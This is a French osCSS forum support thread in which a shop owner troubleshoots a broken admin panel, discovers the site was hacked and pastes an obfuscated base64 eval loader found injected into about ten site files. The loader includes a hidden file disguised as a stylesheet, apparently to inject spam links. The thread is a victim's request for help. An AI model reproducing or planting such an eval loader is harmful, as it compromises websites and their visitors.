[Resolu] Plus d'acces à l'admin

Archive

[Resolu] Plus d'acces à l'admin

Messagepar Grenouye » Jeu 23 Déc 2010, 20:50

Bonjour
J'ai un gros problème qui est arrivé du jour au lendemain, sans raison, sans que je sois réintervenu sur un fichier.
Je n'ai plus du tout accès à l'admin. Donc plus possible de gérer les commandes en cours.
Je tape http://www.monsite/admin comme d'habitude (adresse mémorisée donc pas de possibilité d'erreur),
il veut donc ouvrir le fichier login.php et tout ce que j'obtiens c'est une page blanche. Pas de message d'erreur.
Pourtant rien n'a été changé, les fichiers sont toujous là et le site fonctionne toujours côté client.
Auriez-vous une idée d'où viendrait le problème ?
Merci d'avance !
Dernière édition par Grenouye le Lun 27 Déc 2010, 19:42, édité 1 fois.
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar oscim » Jeu 23 Déc 2010, 23:07

Bonsoir ,

Curieux, comme ca ? Pas de mise a jour d'oscss ? pas d'evolution sur le serveur ?

Et la page d'erreur ? quelle url elle donne ?

Les fichiers de logs sont actif ? quelle et la revision svn de ta boutique ? l'integration d'une rotation des fichiers de logs et assez recente , et sans quoi ca peut poser soucis!

Autre chose, une purge des fichiers de cache peut éventuellement aider ;

Mais, je viens de jetter un oeuil a tes post , tu as une oscss en version 1.xx ?? c'est ca ?
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Plus d'acces à l'admin

Messagepar Grenouye » Ven 24 Déc 2010, 18:48

Bonjour
Merci pour ta réponse.
C'est effectivement arrivé comme ça, sans avoir fait aucune mise à jour.
Je tombe sur une page blanche, sans message d'erreur.
L'adresse url est : http://www.lesptitesboutiques.com/admin/login.php
Quand je vérifie l'activité apparemment il ne trouve pas la page login.php mais elle existe bien.
Par contre je ne sais pas répondre à tes autres questions (fichiers de logs, révision svn, rotation des fichiers de logs)
Quand tu parles d'une purge des fichiers de cache tu veux dire vider le cache ? ça ne change rien sinon.
C'est une version 1.2.1.
En fait je viens de me rendre compte qu'il n'y a pas que l'admin qui ne fonctionne plus mais le site entier !
La page d'accueil fonctionne (http://www.lesptitesboutiques.com) mais tous les liens envoient sur une page blanche.
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar oscim » Ven 24 Déc 2010, 19:21

Quand je vérifie l'activité apparemment il ne trouve pas la page login.php mais elle existe bien.
Par contre je ne sais pas répondre à tes autres questions (fichiers de logs, révision svn, rotation des fichiers de logs)
Quand tu parles d'une purge des fichiers de cache tu veux dire vider le cache ? ça ne change rien sinon.

Normal , ce n'est pas pour les version 1.x mais les 2. Et comme tu as posté sur le forum des 1.x, ca prête a confusion.

Je déplace ton post . dans le forum approprié.

Si tout le site ne fonctionne plus, et que c'est arrivé d'un seul cout, soit tu t'es fait hacké le site, soit il y a une modification au niveau de la boutique ou du serveur en lui meme .

La comme ca je ne peut t'apporter de réponse , le seul moyen et d'intervenir pour chercher / détecter ce qui peut poser soucis.

Verifie les chemins absolu et eventulelement demande a ton herbergeur si il n' pas changer quelque chose
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Plus d'acces à l'admin

Messagepar Grenouye » Ven 24 Déc 2010, 19:38

Je viens juste de raccrocher avec l'hébergeur (1and1) et il me confirme que rien n'a été changé de leur côté.
Il pensait à un problème de php mais apparemment ça n'est pas ça. Et comme je n'ai rien changé au site il n'a jamais vu ça et me parlait aussi éventuellement de piratage. Ce qui me fait peur c'est que depuis quelques jours j'avais beaucoup de commande à 0 et des commandes qui passaient en rouge chez Cybermut avec le message :
"Nous vous informons que votre interface retour a emis un accuse de reception INVALIDE et la commande a ete VALIDEE", je ne sais pas si ça a un rapport.
Chez 1and1 il me dit de vérifier le dossier logs...
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar oscim » Ven 24 Déc 2010, 19:43

Il y a donc fort a parié que ton site a été victime d'un hack .

Dans ce cas, il est necessaire de mettre une page d'attente temporaire, pour eviter le blacklist par google et de verifié les fichiers et repertoire de ton site.

Eventuellement avec un comparateur de fichier et le paquet correspondant.

C'est toi qui à mis le site en ligne, ? ou un presta ? .

Verifie aussi les droit sur les fichier et repertoire , de même que les fichier configure.

si tu n'a pas trop de module installé ? le plus simple et peu être de reinstallé un version ?
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Plus d'acces à l'admin

Messagepar Grenouye » Ven 24 Déc 2010, 19:48

J'ai mis en ligne le site moi même (avec mes maigres connaissances !).
La page d'attente c'est pour signaler que le site est en travaux ? Si je laisse la page d'index tel quel ça ne va pas ? A cause de tous les liens morts ?
Et si je republie le site entier ?
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar Grenouye » Ven 24 Déc 2010, 19:54

Je viens de faire un test. J'ai retransféré tout le dossier admin et maintenant si je me connecte à l'admin ça fonctionne.
Je n'ai pas tout vérifier mais les liens vers les commandes en attente, expédiée etc.. ne marche pas.
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar Grenouye » Sam 25 Déc 2010, 18:42

Je ne sais pas si ça a un rapport mais dans l'admin j'ai ça comme message dans le fil d'actualité :

Warning: fopen() [function.fopen]: URL file-access is disabled in the server configuration in /homepages/36/d210042989/htdocs/admin/includes/classes/xmlparser.php on line 105

Warning: fopen(http://oscss.org/backend-breves.php?id_rubrique=8) [function.fopen]: failed to open stream: no suitable wrapper could be found in /homepages/36/d210042989/htdocs/admin/includes/classes/xmlparser.php on line 105
Unexpected Error While Reading the Feed
Warning: fread(): supplied argument is not a valid stream resource in /homepages/36/d210042989/htdocs/admin/includes/classes/xmlparser.php on line 108

Warning: fclose(): supplied argument is not a valid stream resource in /homepages/36/d210042989/htdocs/admin/includes/classes/xmlparser.php on line 113
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar oscim » Sam 25 Déc 2010, 22:06

Pour ce qui est de l'acces a l'admin, si ca peut.

L'admin appel un flux rss , qui est celui des news d'oscss. Si cet appel ne passe pas, aucun mécanisme de timeout n'existe :(

Je m'en suis aperçu recement .

tu peut commenter l'appel dans le fichier index.php je crois( , de tete)
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Plus d'acces à l'admin

Messagepar Grenouye » Sam 25 Déc 2010, 22:52

Merci pour ta réponse et joyeux noël !
Tu crois que le fait de ne plus pouvoir accéder aux liens "En attente" "Traitement en cours"...etc... a un rapport avec ces messages ?
Comment se fait-il que tout remarche sauf ça ? Pas de rapport avec la base de donnée ?
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar Grenouye » Dim 26 Déc 2010, 20:07

Bon, je viens de remplacer le fichier orders.php par un plus ancien et ça remarche !
Je vais faire une grosse vérification demain mais c'est quand même étrange...
Il me reste un problème qui a commencé il y a quelques jours, pratiquement chaque commande est doublée, une vraie commande et une commande à 0 euros.
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar oscim » Dim 26 Déc 2010, 20:11

Salut

Je vais me repeter, mais si tu constate que en changeant certain fichier ca fonctionne de nouveau, et qu'il n'y a une aucune modif sur le serveur.

Je t'encourage vivement a verifier l'ensemble des fichiers , afin de verifier qu'aucun autre fichier n'as été modifié!!!
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Plus d'acces à l'admin

Messagepar Grenouye » Lun 27 Déc 2010, 14:29

Bon alors maintenant je pencherais plutôt vers un piratage car quand on regarde le code de la page index, il y a des centaines d'adresses de sites qui apparaissent.
J'ai trouvé aussi ce code dans mon fichier Template :

<?php /**/echo eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzM2L2QyMTAwNDI5ODkvaHRkb2NzL2Jsb2cvd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zL2lubGluZXBvcHVwcy9za2lucy9jbGVhcmxvb2tzMi9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

qui n'a rien à faire là...
Comment peut-on modifier mes fichiers sur mon serveur ?
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar Grenouye » Lun 27 Déc 2010, 18:30

Bon désolé, j'ai encore un problème !
J'ai remplacé tout mes fichiers par une ancienne version de ma boutique mais il y a quelquechose de bizarre au niveau du menu de catégories à gauche. Il me met maintenant les anciens noms de catégories que j'avais au début de la création de ma boutique (l'ancienne version que je viens de remettre en ligne n'utilisait même pas ces noms). Mais ce qui est curieux c'est que ça ne le fait que pour certaines pages. Les catégories deviennent correctes lorsque je rentre dans une sous catégorie et pour certaines marques seulement ! Je ne comprends plus rien !! Les noms de catégories ne sont pas décidés uniquement dans l'admin ? Et dans l'admin je n'ai rien changé et il n'y a plus aucune trace des anciens noms nulle part ! Même dans la base de donnée, j'ai fait une recherche et il n'y a que les bons noms.
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar oscim » Lun 27 Déc 2010, 18:49

Juste comme ca, vide ton cache :) Ca peut

Tu n'avais rien mis en dur ?
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Plus d'acces à l'admin

Messagepar Grenouye » Lun 27 Déc 2010, 18:53

Non vider le cache ne change rien et je n'avais pas mis ces liens en dur.
Ah au fait, le code trouvé dans mon fichier template (<?php /**/echo eval(base64_decode...) je l'ai trouvé dans une dizaine d'autres fichiers !
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar oscim » Lun 27 Déc 2010, 19:01

Grenouye a écrit:Non vider le cache ne change rien et je n'avais pas mis ces liens en dur.!


Et tu a bien mis a jour tes tags ? , le seo utilise les tags, pas les nom de fichier, tu utilise le SEO ? si les nom de cat on changé, et que tu a misa jour tes fichiers, les fichier n'invente pas le nom des cat, et il est stocké en db . Donc, soit tu a des truc qui traine, soit tu ne lis pas la bonne db, soit il y a quelque chose en dur.

Grenouye a écrit:Ah au fait, le code trouvé dans mon fichier template (<?php /**/echo eval(base64_decode...) je l'ai trouvé dans une dizaine d'autres fichiers !


Cf, les post precedent, pour ce bout de code; et google et ton amis , je pense que tu devrais apres tous ca, faire un recherche dans le forum sur la securisation d'une boutique lors de sa mise en prod.

Les versions 1.x n'integre rien pour secusité en plus du code la boutique. Donc, le respect des bon droits de fichier et répertoire, l'ajout de htaccess, etc..
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Plus d'acces à l'admin

Messagepar Grenouye » Lun 27 Déc 2010, 19:36

C'est bon ! J'ai juste resauver les catégories dans l'admin (alors que rien n'avait changé)
Merci pour ton aide !
Reste à sécuriser la boutique.
Passer à une version 2 ne serait pas plus simple ?
Grenouye
Membre actif
 
Messages: 52
Inscription: Sam 07 Fév 2009, 20:25

Re: Plus d'acces à l'admin

Messagepar oscim » Lun 27 Déc 2010, 19:38

Plus simple a court terme, non, a long terme, oui .

Jette un oeuil au forum et au passage de la V1 a 2, et l'adapatation des templates qui vont avec...

[Resolu] dans le titre :D :D
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33


Retourner vers osCSS 1.2.1

 


  • Articles en relation
    Réponses
    Vus
    Dernier message

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité

cron